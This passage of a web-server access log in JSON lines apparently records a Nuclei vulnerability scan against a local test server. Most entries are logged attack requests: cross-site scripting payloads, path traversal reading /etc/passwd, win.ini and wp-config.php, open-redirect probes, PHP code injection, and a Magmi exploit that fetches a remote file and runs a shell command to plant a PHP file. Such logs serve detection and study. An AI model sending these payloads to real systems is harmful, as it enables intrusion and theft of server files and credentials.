HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:%0a%0dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xml/User/User.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kb_view_customer.do?sysparm_article=KB00xxxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download.php?file=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /emswebclient/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%0a%0dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /m_login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%09/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29N5m5RFXpIAhrrWovJJE1IHdlg/_/;/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"wsecure_action=update&publish=\x22;} header(\x22Nuclei: CVE-2016-10960\x22); class WSecureConfig2 {var $test=\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wlsecurity.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%2f%2f.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wfc/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database/schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%3F.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cxcum/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5c%5c.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lostpassword.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktop/container/landing.jsp?locale=en_US HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/carbuyaction.php?dopost=return&code=../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5cexample.com@ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/api.php?mobile/webNasIPS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"TNAS", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=mlw_quiz_list&s=\x22>&paged=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%23.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tests/support/stores/test_grid_filter.php?query=phpinfo(); HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /goforms/menu HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /magmi/web/magmi_saveprofile.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main/calendar/agenda_list.php?type=xss\x22+onmouseover=alert(document.domain)+\x22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Account/LogIn?returnUrl=%2F&hasAttemptedCookie=True HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 